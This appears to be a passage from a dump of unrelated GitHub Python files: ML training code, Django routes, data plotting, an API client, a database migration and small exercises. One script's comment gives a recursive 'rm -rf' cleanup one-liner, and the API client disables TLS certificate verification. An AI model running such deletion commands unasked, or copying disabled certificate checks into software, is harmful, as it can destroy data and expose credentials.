accuracy_score\r\n #y_pred = regressor.predict(X_test)\r\n #accuracy = accuracy_score(y_test, y_pred)\r\n #st.write('Accuracy:')\r\n #st.success(str(accuracy))\r\n\r\n st.subheader('Downladable Model')\r\n st.write('Dowload regressor model, and use the following code to create your own ML products')\r\n pickle.dump(regressor, open('regressor.pkl', 'wb'))\r\n \r\n if st.button('Get Link to Download Trained Model as pkl'):\r\n tmp_download_link = download_link('regressor.pkl', 'regressor.pkl', 'Click here to download your Trained Model!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n \r\n st.subheader('Code')\r\n if st.button('Get Link to Python (.py) file to make ML predictions with your model!'):\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/Predictor-Universal_Regressor.ipynb', 'app.py', 'Click here to download your Python Code!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n\r\n st.subheader('Requirements')\r\n if st.button('Get Link to requirements.txt file and Procfile to deploy your ML Model as a website'):\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/requirements.txt', 'requirements.txt', 'Click here to download your requirements.txt!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n tmp_download_link = download_link('/content/gdrive/MyDrive/Machine Learning/Universal Regressor/Procfile', 'Procfile', 'Click here to download the Procfile!')\r\n st.markdown(tmp_download_link, unsafe_allow_html=True)\r\n\r\n st.success('Create a file named \"input.csv\" and place it in the same folder as the regressor model and the Code to make Predictions')\r\n","repo_name":"Varun-Chandrashekhar/Universal-ML-Regressor","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"74567955929","text":"'''\nSimple CNN on mel spectrograms with global avg/max pooling.\nTrains on full audio length.\n'''\nimport numpy as np\nimport torch as t\nimport pytorch_lightning as pl\nfrom itertools import chain\nfrom sklearn.metrics import roc_auc_score, average_precision_score\nfrom src.data.dataset import EBIRD_CODE_TO_INDEX\n\n\nclass SimpleCNN(pl.LightningModule):\n '''\n Input: batch_size x n_mels x segment_size\n Output: batch_size x n_classes\n '''\n def __init__(self, n_classes, n_mels, segment_size, lr=0.001):\n super().__init__()\n self.conv_1 = t.nn.Conv2d(1, 64, (5, 5), padding=(2, 2))\n self.bn_1 = t.nn.BatchNorm2d(64)\n self.maxpool_1 = t.nn.MaxPool2d((4, 3))\n\n self.conv_2 = t.nn.Conv2d(64, 128, (5, 5), padding=(2, 2))\n self.bn_2 = t.nn.BatchNorm2d(128)\n self.maxpool_2 = t.nn.MaxPool2d((4, 3))\n\n self.conv_3 = t.nn.Conv2d(128, 256, (3, 3), padding=(1, 1))\n self.bn_3 = t.nn.BatchNorm2d(256)\n self.maxpool_3 = t.nn.MaxPool2d((4, 3))\n\n self.conv_4 = t.nn.Conv2d(256, 512, (3, 3), padding=(1, 1))\n self.maxpool_4 = t.nn.MaxPool2d((2, 3))\n self.bn_4 = t.nn.BatchNorm2d(512)\n\n # self.conv_a = t.nn.Conv1d(1, 8, 5, padding=1)\n # self.conv_b = t.nn.Conv1d(1, 8, 5)\n self.linear_y = t.nn.Linear(128, 128)\n\n self.dropout = t.nn.Dropout(0.5)\n # self.linear = t.nn.Linear(2816 + 128 * 2, n_classes)\n self.linear = t.nn.Linear(3328, n_classes)\n # self.linear_1 = t.nn.Linear(2816 + 128 * 2, 1024)\n # self.linear_2 = t.nn.Linear(1024, n_classes)\n\n self.n_mels = n_mels\n self.segment_size = segment_size\n self.n_classes = n_classes\n self.lr = lr\n # self.loss_fn = t.nn.BCEWithLogitsLoss()\n # self.loss_fn = t.nn.CrossEntropyLoss()\n self.save_hyperparameters()\n\n def forward(self, batch):\n batch_size = len(batch['mel_specs'])\n n_segments = int(max(batch['segment_lengths']))\n mel_specs = batch['mel_specs']\n\n mel_specs = (\n mel_specs\n .transpose(-2, -1)\n .reshape(n_segments * batch_size, 1, -1, self.n_mels)\n .transpose(-2, -1)\n )\n\n # Mel features\n x = self.conv_1(mel_specs)\n x = self.bn_1(x)\n x = self.maxpool_1(x)\n x = t.relu(x)\n\n x = self.conv_2(x)\n x = self.bn_2(x)\n x = self.maxpool_2(x)\n x = t.relu(x)\n\n x = self.conv_3(x)\n x = self.bn_3(x)\n x = self.maxpool_3(x)\n x = t.relu(x)\n\n x = self.conv_4(x)\n x = self.bn_4(x)\n x = self.maxpool_4(x)\n\n x = x.view(batch_size, n_segments, -1)\n x = self.dropout(x)\n\n # Frequency features\n y = t.sum(mel_specs.view(batch_size, n_segments, self.n_mels, -1), dim=-1)\n # print('y.shape beginning: ', y.shape)\n y_max, _ = t.max(y, dim=-1)\n y_min, _ = t.min(y, dim=-1)\n y_max = y_max.unsqueeze(-1)\n y_min = y_min.unsqueeze(-1)\n\n # print('y_max.shape: ', y_max.shape)\n # print('y_min.shape: ', y_min.shape)\n\n y = (y - y_min) / (y_max - y_min + 0.0001)\n y = self.linear_y(y)\n\n # print('y.shape after linear: ', y.shape)\n\n # Global avg/max pooling\n segment_lengths = batch['segment_lengths'].view(-1, 1)\n\n for i in range(x.size(0)):\n x[i, int(segment_lengths[i].item()):, :] = 0\n y[i, int(segment_lengths[i].item()):, :] = 0\n\n x1 = t.sum(x, dim=1)\n x1 = x1 / segment_lengths\n x2, _ = t.max(x, dim=1)\n\n y1 = t.sum(y, dim=1)\n y1 = y1 / segment_lengths\n y2, _ = t.max(y, dim=1)\n\n # print('y1.shape: ', y1.shape)\n # print('y2.shape: ', y2.shape)\n\n z = t.cat((x1, x2, y1, y2), dim=-1)\n\n z = self.linear(z)\n\n # z = self.linear_1(z)\n # z = t.relu(z)\n # z = self.dropout(z)\n # z = self.linear_2(z)\n\n return z\n\n def training_step(self, batch, batch_idx):\n prediction = self(batch)\n loss = t.nn.functional.binary_cross_entropy_with_logits(\n prediction,\n batch['encoded_ebird_codes']\n )\n # loss = t.nn.functional.cross_entropy(\n # prediction,\n # t.argmax(batch['encoded_ebird_codes'], dim=-1)\n # )\n tensorboard_logs = {'train/loss': loss.item()}\n return {'loss': loss, 'log': tensorboard_logs}\n\n def validation_step(self, batch, batch_idx):\n prediction = self(batch)\n loss = t.nn.functional.binary_cross_entropy_with_logits(\n prediction,\n batch['encoded_ebird_codes']\n )\n # loss = t.nn.functional.cross_entropy(\n # prediction,\n # t.argmax(batch['encoded_ebird_codes'], dim=-1)\n # )\n predicted_ranking = t.argsort(prediction, dim=1, descending=True)\n expected_indices = [EBIRD_CODE_TO_INDEX[x] for x in batch['primary_ebird_codes']]\n\n top_1 = []\n top_3 = []\n top_5 = []\n\n for expected_index, ranking in zip(expected_indices, predicted_ranking):\n if expected_index in ranking[:1]:\n top_1.append(1)\n else:\n top_1.append(0)\n\n if expected_index in ranking[:3]:\n top_3.append(1)\n else:\n top_3.append(0)\n\n if expected_index in ranking[:5]:\n top_5.append(1)\n else:\n top_5.append(0)\n return {\n 'val_loss': loss,\n 'top_1': top_1,\n 'top_3': top_3,\n 'top_5': top_5,\n 'predictions': prediction.cpu().numpy(),\n 'expectations': batch['encoded_ebird_codes'].cpu().numpy(),\n }\n\n def validation_epoch_end(self, outputs):\n val_loss_mean = t.stack([x['val_loss'] for x in outputs]).mean()\n top_1 = t.mean(t.FloatTensor(list(chain(*[x['top_1'] for x in outputs]))))\n top_3 = t.mean(t.FloatTensor(list(chain(*[x['top_3'] for x in outputs]))))\n top_5 = t.mean(t.FloatTensor(list(chain(*[x['top_5'] for x in outputs]))))\n\n predictions = np.concatenate([x['predictions'] for x in outputs])\n expectations = np.concatenate([x['expectations'] for x in outputs])\n\n try:\n roc_auc_macro = roc_auc_score(expectations, predictions, average='macro')\n except ValueError:\n roc_auc_macro = 0\n\n try:\n roc_auc_micro = roc_auc_score(expectations, predictions, average='micro')\n except ValueError:\n roc_auc_micro = 0\n\n try:\n roc_auc_samples = roc_auc_score(expectations, predictions, average='samples')\n except ValueError:\n roc_auc_samples = 0\n\n try:\n avg_pr_macro = average_precision_score(expectations, predictions, average='macro')\n except ValueError:\n avg_pr_macro = 0\n\n try:\n avg_pr_micro = average_precision_score(expectations, predictions, average='micro')\n except ValueError:\n avg_pr_micro = 0\n\n try:\n avg_pr_samples = average_precision_score(expectations, predictions, average='samples')\n except ValueError:\n avg_pr_samples = 0\n\n tensorboard_logs = {\n 'val/loss': val_loss_mean,\n 'val/top_1': top_1,\n 'val/top_3': top_3,\n 'val/top_5': top_5,\n 'val/roc_auc_macro': roc_auc_macro,\n 'val/roc_auc_micro': roc_auc_micro,\n 'val/roc_auc_samples': roc_auc_samples,\n 'val/avg_pr_macro': avg_pr_macro,\n 'val/avg_pr_micro': avg_pr_micro,\n 'val/avg_pr_samples': avg_pr_samples,\n }\n\n return {\n 'val_loss': val_loss_mean,\n 'top_1': top_1,\n 'top_3': top_3,\n 'top_5': top_5,\n 'val/roc_auc_macro': roc_auc_macro,\n 'val/roc_auc_micro': roc_auc_micro,\n 'val/roc_auc_samples': roc_auc_samples,\n 'val/avg_pr_macro': avg_pr_macro,\n 'val/avg_pr_micro': avg_pr_micro,\n 'val/avg_pr_samples': avg_pr_samples,\n 'log': tensorboard_logs,\n }\n\n def configure_optimizers(self):\n optimizer = t.optim.Adam(self.parameters(), lr=self.lr)\n # scheduler = t.optim.lr_scheduler.CyclicLR(\n # optimizer,\n # self.lr / 4,\n # self.lr * 2,\n # step_size_up=500,\n # cycle_momentum=False\n # )\n scheduler = t.optim.lr_scheduler.ReduceLROnPlateau(\n optimizer,\n mode='min',\n factor=0.1,\n patience=4,\n threshold=0.0001,\n min_lr=1e-8,\n )\n return [optimizer], [{\n 'scheduler': scheduler,\n 'interval': 'epoch',\n }]\n\n\nclass Collate:\n def __init__(self, n_frames, min_log, max_log):\n self.min_log = min_log\n self.max_log = max_log\n self.n_frames = n_frames\n\n def __call__(self, batch):\n batch_size = len(batch)\n\n lengths = [x['mel_spec'].size(1) for x in batch]\n max_length = max(lengths)\n\n k = (max_length // self.n_frames) + 1\n padded_length = k * self.n_frames\n\n n_mels = batch[0]['mel_spec'].size(0)\n\n batched_mels = t.zeros(batch_size, n_mels, padded_length)\n\n segment_lengths = t.FloatTensor([(length // self.n_frames) + 1 for length in lengths])\n\n with t.no_grad():\n for i, item in enumerate(batch):\n mel_spec = t.log(item['mel_spec'] + 0.0001)\n mel_spec = (mel_spec - self.min_log) / (self.min_log - self.max_log)\n batched_mels[i, :, :mel_spec.size(1)] = mel_spec\n\n primary_labels = [x['primary_label'] for x in batch]\n secondary_labels = [x['secondary_labels'] for x in batch]\n durations = [x['duration'] for x in batch]\n\n encoded_ebird_codes = t.cat([x['encoded_ebird_codes'].view(1, -1) for x in batch], dim=0)\n primary_ebird_codes = [x['primary_ebird_code'] for x in batch]\n secondary_ebird_codes = list(chain(*[x['secondary_ebird_codes'] for x in batch]))\n\n return {\n 'mel_specs': batched_mels,\n 'original_lengths': lengths,\n 'encoded_ebird_codes': encoded_ebird_codes,\n 'primary_ebird_codes': primary_ebird_codes,\n 'secondary_ebird_codes': secondary_ebird_codes,\n 'primary_labels': primary_labels,\n 'secondary_labels': secondary_labels,\n 'segment_lengths': segment_lengths,\n 'durations': durations,\n }\n","repo_name":"Informhunter/birdcal-identification","sub_path":"src/models/simple_cnn/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":10657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73124067607","text":"from django.urls import path, include\nfrom . import views\n\n\nurlpatterns = [\n\tpath('', views.tipoDeUsuario, name='tipoDeUsuario'),\n path('verSeleccionados/', views.verSeleccionados, name='verSeleccionados'),\n path('admins/', views.admins, name='admins'),\n path('users/', views.users, name='users'),\n path('masInfo//', views.masInfo, name='masInfo'),\n]\n\n\n","repo_name":"zoesacks/muni","sub_path":"proyecto/principal/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"20407153135","text":"__author__ = 'MrHowe'\n# -*- coding: utf-8 -*-\n\n'''\n进阶练习,函数相关2\n\n2016-9-4 晚\n'''\n'''\n1.lambda总结\n\n\n'''\nd = lambda x:x+1\n\n'''\n#练习1:定义一个方法get_num(num),num参数是列表类型,判断列表里面的元素为数字类型。其他类型则报错,并返回一个偶数列表。(注:列表里面的元素偶数)\n\n\n\n'''\n\ndef get_num(num):\n\t'''\n\t返回一个偶数列表\n\t:param num:\n\t:return:lst\n\t'''\n\tlst = []\n\tfor i in num :\n\t\tif isinstance(i,int) or isinstance(i,float):\n\t\t\tif i == 0:\n\t\t\t\tcontinue\n\t\t\tm = i % 2\n\t\t\tif m==0:\n\t\t\t\tlst.append(i)\n\t\telse:\n\t\t\treturn\n\treturn lst\n\n","repo_name":"mrhowe2118/MrHowe","sub_path":"ex_2.py","file_name":"ex_2.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36436021172","text":"import matplotlib.pyplot as plt\r\nimport numpy as np\r\n\r\nimport get_reports\r\nimport datetime\r\n\r\ndef get_diff_dates(x,y):\r\n diff = x-y\r\n return diff.days\r\n\r\n\r\n\r\ndates =[]\r\npercentages = []\r\n\r\ndef plot_bar():\r\n # this is for plotting purpose\r\n load_dates_per()\r\n index = np.arange(len(dates))\r\n plt.bar(index, percentages)\r\n plt.xlabel('Dates', fontsize=7)\r\n plt.ylabel('Attendance Percentage', fontsize=7)\r\n plt.xticks(index, dates, fontsize=10, rotation=30)\r\n plt.title('Attendance Percentage Statistics')\r\n plt.ion()\r\n plt.show()\r\n dates.clear()\r\n percentages.clear()\r\n\r\n\r\ndef load_dates_per():\r\n global dates \r\n global percentages \r\n\r\n for date in get_reports.get_all_att_reports_list():\r\n dates.append(date[:-4])\r\n percentages.append( get_reports.get_desday_att_percentage(date[:-4]))\r\n \r\n\r\ndef checkdates(x,y):\r\n if xend_dt):\r\n print(\"Entered\")\r\n temp = start_dt\r\n start_dt = end_dt\r\n end_dt = temp\r\n #swap dates too\r\n t = start\r\n start = end\r\n end = t\r\n\r\n print(\"Out\")\r\n # print(\"sad\")\r\n global dates\r\n global percentages\r\n print(start,end)\r\n print(start0 :\r\n start_index =0\r\n end_index = 0 \r\n print(\"Entered\")\r\n #find starting date index\r\n for index,date in enumerate(get_reports.get_all_att_reports_list()):\r\n if date[:-4] == start:\r\n start_index =index\r\n break\r\n #find Ending date index\r\n for index,date in enumerate(get_reports.get_all_att_reports_list()):\r\n if date[:-4] == end:\r\n end_index =index\r\n break\r\n temp_list = get_reports.get_all_att_reports_list()\r\n temp_list = temp_list[start_index:end_index+1] \r\n for date in temp_list:\r\n dates.append(date[:-4])\r\n for date in dates:\r\n percentages.append(get_reports.get_desday_att_percentage(date))\r\n plot_range(dates,percentages)\r\n dates.clear()\r\n percentages.clear()\r\n print(\"done \")\r\n return 1\r\n else:\r\n return -1\r\n else:\r\n return -1\r\n\r\ndef get_as_date(st):\r\n return datetime.date(int(st[:4]), int(st[5:7]), int(st[8:]))\r\n\r\n\r\ndef checklen(start,end):\r\n if len(start)==10 and len(end)==10:\r\n return True\r\n else:\r\n return False\r\n\r\ndef plot_range(dates,percentages):\r\n index = np.arange(len(dates))\r\n plt.bar(index, percentages)\r\n plt.xlabel('Dates', fontsize=7)\r\n plt.ylabel('Attendance Percentage', fontsize=7)\r\n plt.xticks(index, dates, fontsize=10, rotation=30)\r\n plt.title('Custom dates range attendance percentage bargraph')\r\n plt.ion() \r\n plt.show()\r\n\r\n# get_range_plot('2019-03-06','2019-03-07')\r\n\r\n# checkdates('2019-03-06','2019-03-07')\r\n\r\n\r\n\r\n\r\n ","repo_name":"idileepd/Face-Recognition-Based-Attendance-System","sub_path":"Software/plot_graphs.py","file_name":"plot_graphs.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"24841518439","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Mar 9 13:35:20 2021\n\n@author: michaelpokornik\n\"\"\"\n\"\"\"\nCreated on Mon Mar 8 10:38:18 2021\n\n@author: michaelpokornik\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport ElectronDataClass as EDC\n\n\n\ntarget = 'uniform' #uniform or channel\ncut = '30deg' # or normal\n#ED = EDC.ElectronDataClass({'Path':'/Volumes/4TBWD/PhotonProject/track_carbon/uniform/30deg/'})\nED = EDC.ElectronDataClass({'Path':'/Volumes/4TBWD/PhotonProject/track_carbon/' + f'{target}' + '/' + f'{cut}' + '/'})\n\n#%%\nt = ED.LoadElectronsAtTime('id',40,{'XLim':(-5,5,1e6),'YLim':(-4,4,1e6)})\nrad_angle = np.arctan2(ED.py[ED.eleInd > 0],ED.px[ED.eleInd > 0])\ndeg_angle = np.rad2deg(rad_angle)\nphi_bins = np.linspace(-180, 180,181)\ndigitized = np.digitize(deg_angle,phi_bins)\nnormCounts = ED.w[ED.eleInd > 0] / np.mean(np.diff(phi_bins))\nphiMidPoints = (phi_bins[1:] + phi_bins[:-1]) / 2\nLineOut = np.bincount(digitized-1, weights=normCounts)\nLineOutMissing = np.zeros((phiMidPoints.shape[0] - LineOut.shape[0]))\nLineOut = np.append(LineOut,LineOutMissing)\nfig = plt.figure()\nax = fig.gca()\nax.plot(phiMidPoints,LineOut)\n#plt.rcParams.update({'font.size': 14})\nax.set_title(r'uniform ' + f'{cut}' + f' {t * 1e15:.2f} fs',fontsize=22)\nax.set_xlabel(r'$\\Phi [\\circ]$',fontsize=16)\nax.set_ylabel(r'$\\frac{dN}{d\\Phi}$',fontsize=16)\nax.set_xticks(np.linspace(-180,180,4))\nax.set_ylim([0, 1e13])\nax.grid()\n","repo_name":"mmpoko/PIC_EpochDataAnalysis","sub_path":"ElectronSingleTimeCaller.py","file_name":"ElectronSingleTimeCaller.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"21903091644","text":"#Display epoch time from time given\n#Mrunali Patel, prn-023\n\nfrom datetime import datetime\nseconds = input(\"Enter number of seconds=\") # taking millisec from user on which any file created\nresult = datetime.fromtimestamp(seconds) # calculating time \nprint(result)\n\n\n\n\n","repo_name":"mrunali10/CodeClub","sub_path":"calculate_Epoch_.py","file_name":"calculate_Epoch_.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"16480420173","text":"archivo = open('quijote.txt')\ncontenido = archivo.read()\narchivo.close()\n\nletras = set()\n\nfor letra in contenido:\n letras.add(letra)\n\nsimbolos = ''\nfor letra in letras:\n if letra not in 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz':\n simbolos += letra\n\nprint('símbolos en el quijote:', simbolos)\n","repo_name":"madepozo/PythonGroup_04","sub_path":"clase1/quijote.py","file_name":"quijote.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"70926110169","text":"\"\"\"rsa URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path\nfrom crypto.views import *\nfrom django.contrib.auth import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',index, name='home'),\n path('success',success, name='success'),\n path('signup/',signup,name='signup'),\n path('gen/',key,name='gen'),\n path('message/',meso,name='meso'),\n path('decrypt/',dec,name='dec'),\n path('about/',about,name='about'),\n path('accounts/login/', views.LoginView.as_view(), name='login'),\n path('accounts/logout/', views.LogoutView.as_view(), name='logout'),\n\n]\n\nadmin.site.site_header = 'Kamau And Sons Crypto'\nadmin.site.site_title = 'Kamau And Sons Crypto'\nadmin.site.index_title = 'Kamau And Sons'","repo_name":"chegejohn159/crypto","sub_path":"cryptosons/rsa/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"18356227201","text":"#7.\tFaça um Programa que leia três números e mostre o maior e o menor deles.\nnum1 = int(input(\"digite um numero\\n\"))\nnum2 = int(input(\"digite outro numero\\n\"))\nnum3 = int(input(\"digite outro numero\\n\"))\n\nmaior = num1\nmenor = num1\n\nif maior < num2:\n maior = num2\n\nif maior < num3:\n maior = num3\n\nif menor > num2:\n menor = num2\n\nif menor > num3:\n menor = num3\n\nprint('Maior: ', maior)\nprint('Menor: ', menor)\n","repo_name":"dropihs/logicPython","sub_path":"2) Estrutura de Decisão/7.py","file_name":"7.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"69948294169","text":"from logging.config import dictConfig, logging\nfrom urlparse import urljoin\n\nimport requests\n\nfrom settings import LOGGING_CONFIG, ERROR_CODES_TO_MEANING_MAPPING\nfrom utils.errors import UnexpectedHTTPStatusCodeReturnedError, HTTPErrorCodeReceivedError\n\ndictConfig(LOGGING_CONFIG)\nlogger = logging.getLogger()\n\n\nclass Connection(object):\n\n def __init__(self, b2c2_base_url, api_token):\n self.b2c2_base_url = b2c2_base_url\n self.api_token = api_token\n\n def _get_headers(self):\n return {\n 'Content-Type': 'application/json',\n 'Authorization': 'Token {api_token}'.format(api_token=self.api_token),\n }\n\n def _check_response_for_known_error_codes(self, response, known_error_codes):\n status_code = response.status_code\n if known_error_codes is not None and status_code in known_error_codes:\n message = ERROR_CODES_TO_MEANING_MAPPING[status_code]\n logger.info('Detected error status code {status_code}: {message}'.format(status_code=status_code,\n message=message))\n raise HTTPErrorCodeReceivedError(message)\n\n def _check_response_for_expected_status_codes(self, response, expected_status_codes):\n status_code = response.status_code\n if expected_status_codes is not None and status_code not in expected_status_codes:\n logger.info('Detected unexpected status code {status_code}'.format(status_code=status_code))\n raise UnexpectedHTTPStatusCodeReturnedError('Received status code {status_code} is not contained in the list of '\n 'expected status codes {expected_status_codes}'.format(expected_status_codes=expected_status_codes,\n status_code=status_code))\n\n def _validate_response(self, response, expected_status_codes, known_error_codes):\n self._check_response_for_known_error_codes(response=response,\n known_error_codes=known_error_codes)\n self._check_response_for_expected_status_codes(response=response,\n expected_status_codes=expected_status_codes)\n\n def get_from_url(self, relative_url, data, expected_status_codes=None, known_error_codes=None):\n url = urljoin(self.b2c2_base_url,\n relative_url)\n logger.info(\"GETting {data} from '{url}'...\".format(data=data,\n url=url))\n response = requests.get(url=url,\n headers=self._get_headers(),\n params=data,\n verify=False)\n self._validate_response(response=response,\n expected_status_codes=expected_status_codes,\n known_error_codes=known_error_codes)\n logger.info(\"...done GETting {data} from '{url}'!\".format(data=data,\n url=url))\n return response\n\n def post_to_url(self, relative_url, data, expected_status_codes=None, known_error_codes=None):\n url = urljoin(self.b2c2_base_url,\n relative_url)\n logger.info(\"POSTing {data} to '{url}'...\".format(data=data,\n url=url))\n response = requests.post(url=url,\n headers=self._get_headers(),\n json=data,\n verify=False)\n self._validate_response(response=response,\n expected_status_codes=expected_status_codes,\n known_error_codes=known_error_codes)\n logger.info(\"...done POSTing {data} to '{url}'!\".format(data=data,\n url=url))\n return response\n","repo_name":"dumrauf/b2c2_client","sub_path":"utils/connection.py","file_name":"connection.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"13439878291","text":"\"\"\"migrate molecule table\n\nRevision ID: fd76a1459fa3\nRevises: 2a334994fcb3\nCreate Date: 2021-10-12 10:31:53.993770\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = \"fd76a1459fa3\"\ndown_revision = \"2a334994fcb3\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.alter_column(\n \"molecule\", \"molecule_hash\", existing_type=sa.VARCHAR(), type_=sa.CHAR(length=40), existing_nullable=True\n )\n op.alter_column(\n \"molecule\",\n \"identifiers\",\n existing_type=postgresql.JSON(astext_type=sa.Text()),\n type_=postgresql.JSONB(astext_type=sa.Text()),\n existing_nullable=True,\n )\n\n op.alter_column(\"molecule\", \"fix_com\", existing_type=sa.BOOLEAN(), nullable=False)\n op.alter_column(\"molecule\", \"fix_orientation\", existing_type=sa.BOOLEAN(), nullable=False)\n\n op.create_index(\"ix_molecule_identifiers\", \"molecule\", [\"identifiers\"], unique=False, postgresql_using=\"gin\")\n op.drop_column(\"molecule\", \"molecular_formula\")\n # ### end Alembic commands ###\n\n\ndef downgrade():\n raise RuntimeError(\"Cannot downgrade\")\n","repo_name":"MolSSI/QCFractal","sub_path":"qcfractal/qcfractal/alembic/versions/2021-10-12-fd76a1459fa3_migrate_molecule_table.py","file_name":"2021-10-12-fd76a1459fa3_migrate_molecule_table.py","file_ext":"py","file_size_in_byte":1238,"program_lang":"python","lang":"en","doc_type":"code","stars":134,"dataset":"github-code","pt":"31"} +{"seq_id":"13130799982","text":"import os\nimport os.path as pth\nimport glob\n\n\nif __name__ == '__main__':\n for npz_path in glob.glob(\"data/**/*.npz\", recursive=True):\n npz_file = pth.basename(npz_path)\n data_dir, set_name = pth.split(pth.dirname(npz_path))\n new_path = pth.join(data_dir, \"%s_%s\" % (set_name, npz_file))\n\n print(\"%s -> %s\" % (npz_path, new_path))\n os.rename(npz_path, new_path)\n\n # Afterwards clean up extracted files with\n # find . -type d -maxdepth 2 -mindepth 2 -exec rm -rf {} \\;\n","repo_name":"anofox/aws_summit","sub_path":"02_rename_move_npz_files.py","file_name":"02_rename_move_npz_files.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19837540092","text":"# coding: utf-8\n\nfrom __future__ import absolute_import\nfrom datetime import date, datetime # noqa: F401\n\nfrom typing import List, Dict # noqa: F401\n\nfrom swagger_server.models.base_model_ import Model\nfrom swagger_server.models.ethernet_top_ethernet import EthernetTopEthernet # noqa: F401,E501\nfrom swagger_server import util\n\n\nclass EthernetTop(Model):\n \"\"\"NOTE: This class is auto generated by the swagger code generator program.\n\n Do not edit the class manually.\n \"\"\"\n\n def __init__(self, ethernet: EthernetTopEthernet=None): # noqa: E501\n \"\"\"EthernetTop - a model defined in Swagger\n\n :param ethernet: The ethernet of this EthernetTop. # noqa: E501\n :type ethernet: EthernetTopEthernet\n \"\"\"\n self.swagger_types = {\n 'ethernet': EthernetTopEthernet\n }\n\n self.attribute_map = {\n 'ethernet': 'ethernet'\n }\n\n self._ethernet = ethernet\n\n @classmethod\n def from_dict(cls, dikt) -> 'EthernetTop':\n \"\"\"Returns the dict as a model\n\n :param dikt: A dict.\n :type: dict\n :return: The EthernetTop of this EthernetTop. # noqa: E501\n :rtype: EthernetTop\n \"\"\"\n return util.deserialize_model(dikt, cls)\n\n @property\n def ethernet(self) -> EthernetTopEthernet:\n \"\"\"Gets the ethernet of this EthernetTop.\n\n\n :return: The ethernet of this EthernetTop.\n :rtype: EthernetTopEthernet\n \"\"\"\n return self._ethernet\n\n @ethernet.setter\n def ethernet(self, ethernet: EthernetTopEthernet):\n \"\"\"Sets the ethernet of this EthernetTop.\n\n\n :param ethernet: The ethernet of this EthernetTop.\n :type ethernet: EthernetTopEthernet\n \"\"\"\n\n self._ethernet = ethernet\n","repo_name":"ajragusa/OpenConfigAPI","sub_path":"python-flask/swagger_server/models/ethernet_top.py","file_name":"ethernet_top.py","file_ext":"py","file_size_in_byte":1772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"8664122141","text":"from ioffice.base import BasePageSection, IOFrameDialog\nfrom selenium.webdriver.common.by import By\n\n\nclass DeleteTaskOptionsDialog(BasePageSection, IOFrameDialog):\n\n def __init__(self, client_id, plan_id, parent_page, current_frame=None):\n super().__init__(parent_page)\n self.FRAME = (By.XPATH, DeleteTaskOptionsDialog.Locators._FRAME.format(client_id, plan_id))\n self.frame_locator = self.FRAME\n self.prev_frame_locator = current_frame\n self._switch_to_frame()\n\n def click_ok(self):\n self.page.click(DeleteTaskOptionsDialog.Locators.OK_BUTTON)\n return self\n\n class Locators(object):\n _FRAME = \"//iframe[@src='/nio/plan/{0}/OpenYesNoDialog/{1}']\"\n OK_BUTTON = (By.LINK_TEXT, \"Ok\")\n","repo_name":"intelliflovrk/raj_test_io","sub_path":"ioffice/plans/delete_task_options_dialog.py","file_name":"delete_task_options_dialog.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35158817153","text":"def solution(triangle):\n dp = triangle\n n = len(triangle)\n\n for i in range(1, n):\n for j in range(i+1):\n # 왼쪽 끝인 경우\n if j == 0:\n dp[i][j] = dp[i-1][j] + triangle[i][j]\n # 오른쪽 끝인 경우\n elif 